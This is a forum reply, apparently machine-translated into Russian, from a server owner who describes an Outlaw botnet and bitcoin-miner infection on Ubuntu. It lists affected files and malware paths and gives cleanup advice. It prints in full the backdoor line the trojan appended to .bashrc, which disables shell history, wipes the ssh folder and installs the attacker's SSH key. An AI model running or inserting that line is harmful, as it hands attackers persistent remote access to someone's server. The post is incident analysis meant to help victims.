То же самое случилось со мной, и я заметил вчера. Я проверил файл, /var/log/syslog
и этот IP (185.234.218.40), по-видимому, автоматически выполнял cronjobs.
Я проверил это на http://whatismyipaddress.com ( https://whatismyipaddress.com/ip/185.234.218.40 ), и у него есть несколько отчетов. Эти файлы были отредактированы трояном:
- .bashrc
- .ssh / authorized_keys
Я нашел это в конце .bashrc
(который выполняется каждый раз, когда открывается bash):
set +o history
export PATH=/home/user/.bin:$PATH
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod 700 .ssh && cd .ssh && chmod 600 authorized_keys && cd ~
Это удаление вашего authorized_keys
файла, представляющего собой список ключей SSH, которым разрешено подключаться без пароля. Затем он добавляет ключ SSH атакующего:
ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr
Кроме того, я нашел эту папку:, /tmp/.X13-unix/.rsync
где находится все вредоносное ПО. Я даже нашел файл, /tmp/.X13-unix/.rsync/c/ip
файл, содержащий 70 000 IP-адресов, которые, скорее всего, являются другими жертвами или серверами узлов.
Есть 2 решения: A:
Добавьте брандмауэр, блокирующий все исходящие соединения, кроме порта 22 и других, которые вы считаете необходимыми, и включите fail2ban, программу, которая блокирует IP-адрес после X неудачных попыток ввода пароля.
Убить все задания cron:,
ps aux | grep cron
затем убить PID, который появляется
Измените свой пароль на безопасный
B:
Сделайте резервную копию любых файлов или папок, которые вам нужны или которые вы хотите
Перезагрузите сервер и переустановите Ubuntu или создайте новую каплю напрямую.
Как сказал Том Виггерс, вы, безусловно, являетесь частью бот-сети по майнингу биткойнов, и у вашего сервера есть черный ход . Бэкдор использует эксплойт Perl, файл, расположенный здесь:, /tmp/.X13-unix/.rsync/b/run
содержащий это ( https://pastebin.com/ceP2jsUy )
Самые подозрительные папки, которые я нашел, были:
Наконец, есть статья, относящаяся к бэкдору Perl:
https://blog.trendmicro.com/trendlabs-security-intelligence/outlaw-hacking-groups-botnet-observed-spreading-miner-perl-based-backdoor/
Я надеюсь, что вы найдете это полезным.
.firefoxcatche
вероятно, не имеет ничего общего с Firefox - это может быть просто биткойн-майнер? Попробуйте загрузить исполняемые файлы в virustotal.